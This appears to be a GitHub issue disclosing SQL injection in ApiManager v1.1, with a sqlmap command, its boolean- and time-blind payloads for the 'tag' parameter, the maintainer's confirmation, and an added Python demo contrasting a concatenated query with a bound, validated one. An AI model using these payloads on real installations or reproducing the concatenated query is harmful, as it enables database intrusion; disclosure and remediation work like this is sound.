
ApiManager v1.1 sql injection

Open mukeers opened this issue 4 years ago • 1 comments

poc : python3 sqlmap.py -u "http://localhost/index.php?act=api&tag=8"

sqlmap identified the following injection point(s) with a total of HTTP(s) requests:

Parameter: tag (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=api&tag=8' AND 5773=5773 AND 'aeqS'='aeqS

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: act=api&tag=8' AND (SELECT 2616 FROM (SELECT(SLEEP(5)))Uikd) AND 'WWaT'='WWaT

mukeers, Nov 10 '21 13:11

Thank you for your feedback. SQL injection exists in the ApiManager for version. Please use the golang version.

gongwalker, Nov 13 '21 12:11
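
The `tag` finding reported above, as an added example that is not part of the original issue and is not ApiManager's own code: it runs the boolean payload quoted in the report against a concatenated query and against a bound, validated one. The `api` table, its columns, the function names and the in-memory SQLite database (standing in for the MySQL backend) are assumptions made for illustration.

```python
import re
import sqlite3

# Boolean-based payload value for `tag`, copied from the sqlmap output in the report.
PAGE_PAYLOAD = "8' AND 5773=5773 AND 'aeqS'='aeqS"

def make_db():
    """Constructed sample data; the real ApiManager schema is not shown on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE api (id INTEGER PRIMARY KEY, tag INTEGER, name TEXT)")
    db.executemany("INSERT INTO api (tag, name) VALUES (?, ?)",
                   [(8, "login"), (8, "logout"), (9, "billing")])
    return db

def list_apis_concat(db, raw_tag):
    """'Before' pattern: the request value becomes part of the SQL text,
    so a quote in it ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT name FROM api WHERE tag = '" + raw_tag + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def list_apis_bound(db, tag):
    """Bound parameter: the value is sent separately from the statement
    and is only ever compared as data, never parsed as SQL."""
    rows = db.execute("SELECT name FROM api WHERE tag = ? ORDER BY id", (tag,))
    return [row[0] for row in rows]

def parse_tag(raw_tag):
    """Allow-list validation: a tag id is a short run of ASCII digits."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_tag):
        raise ValueError("tag must be a numeric id")
    return int(raw_tag)

def handle_request(db, raw_tag):
    """Hardened path: validate first, then bind."""
    return list_apis_bound(db, parse_tag(raw_tag))

if __name__ == "__main__":
    db = make_db()
    # The concatenated query evaluates the appended conditions as SQL.
    print("concat + payload:", list_apis_concat(db, PAGE_PAYLOAD))
    # The bound query treats the whole payload as one value that matches no row.
    print("bound  + payload:", list_apis_bound(db, PAGE_PAYLOAD))
    try:
        handle_request(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("validated path rejects payload:", exc)
```
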